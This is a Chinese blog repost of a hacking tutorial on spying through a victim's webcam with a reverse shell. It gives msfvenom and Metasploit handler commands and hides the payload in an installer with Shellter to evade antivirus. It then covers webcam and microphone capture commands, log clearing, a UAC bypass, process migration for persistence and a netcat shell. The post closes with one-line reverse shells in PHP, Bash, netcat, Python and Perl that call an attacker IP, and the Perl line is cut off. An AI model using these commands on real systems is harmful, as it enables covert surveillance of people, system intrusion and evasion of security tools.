• SEO文章推广! 合作联系qq:122325244 正式全面改版 !免费SEO地址:https://www.seozhan.cn/tool 站长QQ群
  • 如果您觉得本站非常有看点,那么赶紧使用Ctrl+D 收藏SEO站长博客吧

使用反向Shell控制摄像头

资源分享 SEO站长博客 4个月前 (08-13) 314次浏览 已收录 0个评论

computer-programmers-type-code-laptop_29110-6.jpg

如果你已经用胶条封住了你的网络摄像头,你可能是因为听说过黑客或 NSA 可以远程监视你。那么问题来了,这些你素未谋面人又是如何远程连接到你的机器并监视你的呢?

这可能是因为你将你的 CCTV,IP摄像头公开暴露在了互联网上,而攻击者又在 Shodan 等网站上发现了它们。加之你又没有更改它们的默认密码和 bam,导致攻击者顺利控制了你的摄像头,并对你的一举一动进行监视。

以上是物联网摄像头最常见的安全问题。但如果是内置的网络摄像头,那么更可能的解释是攻击者通过 Meterpreter payload 入侵并控制了它。使用 Meterpreter 攻击者可以获取到一个反向 shell,这也是本文将要讨论的内容。有关 Meterpreter 的更多信息,请参阅:https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/ 

这里,你可能有个疑问。为什么攻击者不直接访问你的机器,而是通过一个反向shell呢?其实原因很简单,因为直接访问的方式很可能会被阻止。相比起出站流量,入站流量更容易受到限制。另一方面,如果我们主动进行连接,那么目标机器更有可能放行该流量。这是因为目标机器想要与我们的机器建立连接。

1.png

msfvenom 是一个框架,我们将用它来获取一个反向shell。它已被预装在了 Parrot 和 Kali 上。首先,让我们运行以下命令来创建 Meterpreter reverse TCP shell payload。

msfvenom -p windows/meterpreter/reverse_tcp -a x86 –platform windows -f exe LHOST=192.168.X.X LPORT=4444 -o /home/parrot/name.exe

2.png

创建完成后,现在让我们来上传它……….blocked。这是因为 MeterPreter payload 名声在外,早已被各个安全软件所标记,因此大多数的安全软件都能够发现阻止/隔离它。

3.png

我们可以尝试使用一个名为 Shellter 的工具,来更改其哈希并将反向shell嵌入到另一个文件当中。之所以选择将shell嵌入到一个安装文件中,是因为大多数安装文件需要以管理员身份运行。正如你在之后将看到的那样,以管理员身份运行漏洞利用程序,可以为我们省去很多的麻烦。

你可以通过 shelter 来直接启动它。同样,它已被预装在了 Parrot 和 Kali 上。

4.png

让我们使用Auto [A]并定位我为本例创建的可执行文件。

5.png

接下来,我们选择反向TCP shell并输入我们机器的 IP 和端口(攻击者)。完成后,它会将 shell 嵌入到你选择的 exe 文件中,以便你将其上传到目标机器。现在你需要通过一种方法将它放到目标机器上,但对于本例我将复制并粘贴。

虽然,我们隐藏了 Meterpreter shell,但 AV 还是成功地检测到了它。为了便于我们的演示,我们现在暂时先将 AV 关闭。当然,在现实场景中攻击者不可能像我这么随意,更多的是通过技术手段击溃 AV,或是创建一个目标无法检测的 payload。

然而,尽管屏蔽了 Meterpreter 外壳,AV 仍设法检测到它。 我现在就打算把它关掉,因为我可以。 在现实世界中,攻击者会将 AV 瘫痪或使其盲目,以便他们可以降低有效载荷。

现在,让我们运行它。

在开始之前,让我们在攻击机机上加载 msfconsole(Metasploit)并运行以下命令:

msfconsole use multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.X.X set LPORT 4444 run

6.png

你的会话将侦听反向shell 脚本中指定的端口和 IP。现在,我们以用户身份运行 exploit:

7.png

正如你在右侧所看到的,我们有几次会话建立失败的情况。这就是我之前提到的为什么需要用户以管理员身份运行的原因。那样就可以顺利运行和注入所有的脚本和 DLL。如果用户以管理员身份运行,你将不会看到任何失败的情况。如下所示:

8.png

成功获取反向shell 后,现在我们就可以针对目标机器执行我们想要的操作了。如果你的目标是摄像头,那么你可以执行以下操作:

Show Webcams: webcam_list
Webcam Snap Help: webcam_snap -h
Take a Picture and don’t load the image after: webcam_snap -i 1 -v false Record audio: record_mic Record Webcam: run webcam -p /var/www/ Stop recording: run webcam -s

9.jpg

不仅仅是网络摄像头(Webcams)。你还可以执行更多其他的命令。例如:清除所有日志(应用程序,系统和安全日志):clearev

这只是一个例子,黑客也不太可能会运行它。因为这么做反而会打草惊蛇提醒了管理员。如果一台机器你发现所有日志都被清除了,那么你可以初步断定有人已经使用过它了。相反,攻击者更有可能的是删除选择的事件来掩盖他们的痕迹。

所有这些都需要管理员权限,而你的用户可能无法使用提升的权限来运行它。那么,你可以使用像 bypassuac_comhijacker 这样的命令。首先,你仍需要得到一个普通用户级别的反向 shell。

获得 shell 后,输入 background 并按 Enter 键。这会将当前会话移至后台。然后你就可以针对当前会话使用bypassuac_comhijack 漏洞利用程序了,如下:

10.png

然后,你可以回到原始会话并运行以下命令:

11.png

成功运行后,你将获取到一个 admin shell。为了与目标机器建立长期稳定的后门连接,我们需要将我们的反向 shell 隐藏在一个更为隐蔽和稳定的进程中(而不是 Putty exe 或 installer 文件中)因为这些应用一旦被关闭,我们的连接就将丢失。这就是为什么我们需要尽快迁移我们的反向 shell,到那些可以持续运行进程中的原因。

12.png

首先,让我们查看正在运行的进程有哪些。

13.png

找到相对稳定的进程后,运行 migrate [PID]

14.png

然后,它会将你的 Meterpreter 会话迁移到另一个进程中。这样即使他们关闭了被利用的应用程序,你的会话也将被保留。

正如你所看到的,Meterpreter 非常的强大。但这并不是你获得反向 shell 的唯一方法。你还可以使用 Netcat。相比起 Meterpreter,某些 AV 供应商并不将其视为威胁。你可以点击此处,查看 virustotal 中的检测结果。

15.png

你可以在 Parrot 或 Kali 上的 usr/share/windows-binaries/nc.exe 下找到 Netcat。将 nc.exe 上传到目标机器后,我们可以运行 nc.exe [Attacker IP] [Port] -e cmd.exe。

16.png

在攻击者机器上我们需要侦听连接,这可以通过运行 nc -lvp [Chosen port]命令来完成。

你将获取到一个普通用户权限的简单反向 shell,这对你来说是一个好的开始。然后,你可以通过它来进一步的利用系统获得管理员权限。以下是一些运行反向 shell 的示例:

PHP

php -r ‘$sock=fsockopen(“192.168.0.10”,1234);exec(“/bin/sh -i <&3 >&3 2>&3”);’

Bash

bash -i >& /dev/tcp/192.168.0.1/8080 0>&1

Netcat Linux

nc 192.168.0.10 1234 -e /bin/sh

Python

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.0.10”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

Perl

perl -e ‘use Socket;$i=“192.168.0.10”;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,

*参考来源:ctrlaltdel,FB 小编 secist 编译,转自 FreeBuf


SEO站长博客 , 版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明原文链接:使用反向Shell控制摄像头
喜欢 (0)
[h4ck3st@126.com]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址